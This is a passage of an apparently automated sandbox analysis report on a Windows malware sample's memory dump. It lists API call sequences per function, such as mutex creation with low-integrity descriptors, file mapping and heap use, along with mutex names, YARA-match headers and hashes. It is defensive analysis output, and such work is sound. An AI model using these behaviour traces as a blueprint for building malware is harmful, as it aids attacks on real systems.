                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFlushOpenValue
                                                                                                                                                                                                            • String ID: 6988939ca$software\microsoft
                                                                                                                                                                                                            • API String ID: 2510291871-1519107699
                                                                                                                                                                                                            • Opcode ID: a1033383e7db88813bb0cd748f5183bbaa2ffa769072f61ad7327ccc28416bd4
                                                                                                                                                                                                            • Instruction ID: 72f9eb0a350d877dc83aa5de527ef66f268be27ba4172f40b2360f624016b842
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1033383e7db88813bb0cd748f5183bbaa2ffa769072f61ad7327ccc28416bd4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7F036B5B40304FBEB20CAA1CD4AFAA777CEF04744F504494FB01D7140D7B1AA109795
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02BD193E
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732},00000006), ref: 02BD195B
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BD1962
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD1974
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD1985
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                            • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
                                                                                                                                                                                                            • API String ID: 1370207991-2011349651
                                                                                                                                                                                                            • Opcode ID: 76e2330374699abc0b8d7742c765ac8931b70a5310b2ccd9c470c172532d8a44
                                                                                                                                                                                                            • Instruction ID: f3ef4ae27ef25e503a5ff0a24e55c1e5b7e2917cea2d26b22a73af9df9b1d24b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76e2330374699abc0b8d7742c765ac8931b70a5310b2ccd9c470c172532d8a44
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0F0E97099621477E3705BA99C09B9F7BACDF04B85F440694FB09A7180E7A4461147E1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02BCB98E
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                              • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014},00000006), ref: 02BCB9AB
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCB9B2
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCB9C4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCB9D5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                            • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
                                                                                                                                                                                                            • API String ID: 1370207991-2598904463
                                                                                                                                                                                                            • Opcode ID: d9d08b17d6248707af68779263803e972be9044205a14da87876b2f226c02334
                                                                                                                                                                                                            • Instruction ID: 411c9387f95723521db05a81b3024383851d673268e7b3ca2fef773afded24dd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9d08b17d6248707af68779263803e972be9044205a14da87876b2f226c02334
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0F08230992614B7E6705BAA9D0AB9E7B5CDF02B99F500586FB05A71C09BF0561087E1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c22bfc42e8cd49b5899e496928533ac8fa954609482470bd65f3b5cacdee762a
                                                                                                                                                                                                            • Instruction ID: 3597fc924cee0faf7a5fc5a14788891d31f161c4a9f7e79458bc170d146ce235
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c22bfc42e8cd49b5899e496928533ac8fa954609482470bd65f3b5cacdee762a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A01B172A86204ABD720ABF5FC88F9B7B5CEB84B95F014A23F60487100D7369810CBF0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02BD8AF4
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02BD9447), ref: 02BD8B0E
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BD8B36
                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,?,?,?,?,02BD9447), ref: 02BD8B42
                                                                                                                                                                                                              • Part of subcall function 02BB7310: GetHandleInformation.KERNEL32(?,00000000), ref: 02BB7324
                                                                                                                                                                                                              • Part of subcall function 02BB7310: CloseHandle.KERNEL32(?), ref: 02BB7335
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BD8B6E
                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00140B17,02BD9447,00000000,00140B17), ref: 02BD8BA0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3741995677-0
                                                                                                                                                                                                            • Opcode ID: 4626b266e24f99b21e26776a79b6088f0a231a710e5ee4dcb7d4660bd0dfd561
                                                                                                                                                                                                            • Instruction ID: 04f908a253ad6f4c3636997d0aa294500076e886082e2bd7ef4281fdd2832de8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4626b266e24f99b21e26776a79b6088f0a231a710e5ee4dcb7d4660bd0dfd561
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC316DB2B00609BBD710DF59D881BAAF7B8FF58715F10829AEA0497740E771AD61CBD0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GdiFlush.GDI32(00000000,?,00000000), ref: 02BB88B6
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB88C4
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,?), ref: 02BB88DA
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(00000000,?), ref: 02BB88E6
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BB88F3
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BB8915
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3485819771-0
                                                                                                                                                                                                            • Opcode ID: c8a9c4738d92e97b8ab842a2833263fe036c2740f70751d942ee49cc91445c56
                                                                                                                                                                                                            • Instruction ID: 025b83dc8ec62b252a8dd7d47ffe644a09144d5d360d739ad2234437003c65b6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8a9c4738d92e97b8ab842a2833263fe036c2740f70751d942ee49cc91445c56
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D31C935E401049FCF11CF69D984AFA7BBEEF88794B1485A9EA44DB345D770E811CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocexitfree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3367576030-0
                                                                                                                                                                                                            • Opcode ID: 8715d87a6b0ce08040e7d8eb63462857548e5286f77aa6196f1b70fc59c8ae33
                                                                                                                                                                                                            • Instruction ID: d6a07568e2c4dbdadc3b1baf9722c85308eacf63bcd83cf73c8ab32dabf54504
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8715d87a6b0ce08040e7d8eb63462857548e5286f77aa6196f1b70fc59c8ae33
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1216DB1A00309AFDB21CF58DC80AAB7BA8FF48350F144569FE4597340D7B1ED108BA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02BD52EB
                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02BD531C
                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 02BD5338
                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 02BD533E
                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02BD534C
                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02BD5364
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$MultipleObjectsPeekWait$DispatchTranslate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1800058468-0
                                                                                                                                                                                                            • Opcode ID: c397b38e6d45b19fb68301f46c90fdb7661779217a6f6eb38397db9a569f05f5
                                                                                                                                                                                                            • Instruction ID: 733e3c5ac0ff8c8fa8c312f868f4720d677e56cbcfafc037ab3e5d821aae978c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c397b38e6d45b19fb68301f46c90fdb7661779217a6f6eb38397db9a569f05f5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1119472B803097BE73096589C86FEEB769EB40B50F908955FB05EB1C0D7E1E451C7A4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BBBAAF
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBBAD4
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBBAE2
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32 ref: 02BBBB17
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBBB1E
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBBB2E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1675675969-0
                                                                                                                                                                                                            • Opcode ID: 68d0da7ad59ad818ef8cf61064f3d28e91baabc622ec85d77a47d13579a7b37f
                                                                                                                                                                                                            • Instruction ID: 5a711949704ea66b8b8a19a7ef3818136c67d139eca0be969fcca451e9fb4231
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68d0da7ad59ad818ef8cf61064f3d28e91baabc622ec85d77a47d13579a7b37f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C01F532A411109BD7759F28FC0CFF533A0EF447A9F454AA5EA059B295C3B19852CFA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BBB92D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBB94B
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32 ref: 02BBB980
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBB987
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBB99B
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000005), ref: 02BBB9AA
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentErrorLastMessageMutexObjectReleaseSendSingleThreadWaitWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 699575883-0
                                                                                                                                                                                                            • Opcode ID: b1279fbb404f6e8d854f44b469126fd51c74ebc2946dd5be9ac90a7ea3a331f3
                                                                                                                                                                                                            • Instruction ID: 4ab36eff19ed875930441f54d6ef5c100344c30e861300313e1c3929620fb79b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1279fbb404f6e8d854f44b469126fd51c74ebc2946dd5be9ac90a7ea3a331f3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8801A230A812009FD7648F24E84DBE537A0FF48399F8549A4F7559B2D1C7B59451CF91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowRect.USER32(02BBCD24,00000000), ref: 02BBCBFF
                                                                                                                                                                                                            • GetWindowLongA.USER32(02BBCD24,000000F0), ref: 02BBCC19
                                                                                                                                                                                                            • GetScrollBarInfo.USER32(02BBCD24,000000FA,?), ref: 02BBCC34
                                                                                                                                                                                                            • GetScrollBarInfo.USER32(02BBCD24,000000FB,0000003C), ref: 02BBCC61
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InfoScrollWindow$LongRect
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 4167475372-4251816714
                                                                                                                                                                                                            • Opcode ID: 3081973297532e19feb020a93bfc817a846309b9c647e1c657ac2d560d1dfbd3
                                                                                                                                                                                                            • Instruction ID: 68f7259f094113e4bf1590c79077a86b9ca7a7f2509b40a4e297f73a345e5ba9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3081973297532e19feb020a93bfc817a846309b9c647e1c657ac2d560d1dfbd3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE3115B0901B01AFC325CF6AC584AA6FBF5FF58315B608A1EE49A93A64D770F450CF90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BF41AB
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BF41C1
                                                                                                                                                                                                            • free.MSVCRT(00000000,?,?,?,?,000000FF,?), ref: 02BF41D3
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02BF41EF
                                                                                                                                                                                                            • free.MSVCRT(00000000,?,?,?,?,?,000000FF,?), ref: 02BF420E
                                                                                                                                                                                                            • free.MSVCRT(00000000,?,?,?,?,?,000000FF,?), ref: 02BF421C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: freemalloc
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3061335427-0
                                                                                                                                                                                                            • Opcode ID: 782726452593e25d881ef42993aafeafd3968412683e38fab6c8a60cd5a0969f
                                                                                                                                                                                                            • Instruction ID: 69a1b9ea651218f022f7d1644b8be1e8dc5d3704488cdee7a44028e1dc8c59b4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 782726452593e25d881ef42993aafeafd3968412683e38fab6c8a60cd5a0969f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5215EF2A117144BD770AF79AC8164BB7E4EF84225B198C3ED78AD7600D370E1598B91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,76F8F380,00000000,00000000,?,?,02BC4E91,?,00000000), ref: 02BB74C6
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB74E4
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB750D
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: RtlAllocateHeap.NTDLL(00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB7514
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: memset.MSVCRT ref: 02BB7527
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB7553
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB7563
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB7572
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB7585
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7594
                                                                                                                                                                                                              • Part of subcall function 02BB74A0: HeapValidate.KERNEL32(00000000), ref: 02BB759B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,76F92F00,02BC3D3F), ref: 02BB791C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BB7923
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB7933
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,76F92F00,02BC3D3F), ref: 02BB7955
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB7958
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7965
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB7968
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$Validatememset$AllocAllocateCreateFreeLockPointerReadSizeUnlock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4191958461-0
                                                                                                                                                                                                            • Opcode ID: 34cebae6a0784b7cce7d98b9ae920b151e40b831387aca7467231857b9572b89
                                                                                                                                                                                                            • Instruction ID: 023e1a8f1ddeec67437704c4c3ab3070623ee9a422b2ba651f2a4461b04d62a4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34cebae6a0784b7cce7d98b9ae920b151e40b831387aca7467231857b9572b89
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F411A372A01214BBD731AAA59C44FABB66CEFC8B55F510154BA44E7280DFB0D90087E0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,02BD5097,00000000,76DC34D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC41FE
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4205
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4215
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,76DC34D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4229
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4230
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000,02BD4081,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC424A
                                                                                                                                                                                                            • HeapReAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4251
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Alloc$Validatememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3638075499-0
                                                                                                                                                                                                            • Opcode ID: c5c7ed7c1994d230e59fae7223682666d463b9101672e334c5c18d0c030be2b3
                                                                                                                                                                                                            • Instruction ID: d6f1de9861bd99430aa6ec0255bf03289b2cacfd33664836569bb1e692ca35e9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5c7ed7c1994d230e59fae7223682666d463b9101672e334c5c18d0c030be2b3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8401DF77A8021067D67056BAAC49F4B7A6CEBD07B2F254221FB48CB284CA21881487F4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BD4980: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7750FFB0,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49AD
                                                                                                                                                                                                              • Part of subcall function 02BD4980: GetProcessTimes.KERNEL32(00000000,?,?,?,02BC7967,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49CA
                                                                                                                                                                                                              • Part of subcall function 02BD4980: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02BC7967,00000000,?,00000000), ref: 02BD49E2
                                                                                                                                                                                                              • Part of subcall function 02BD4980: CloseHandle.KERNEL32(00000000,?,?,?,?,?,02BC7967,00000000), ref: 02BD49F3
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02BFFB80,000002F0,00000000,00000000,0B521168,02BC7AD4), ref: 02BC7828
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7844
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,0B521168), ref: 02BC7869
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC786C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,0B521168), ref: 02BC7879
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC787C
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7887
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
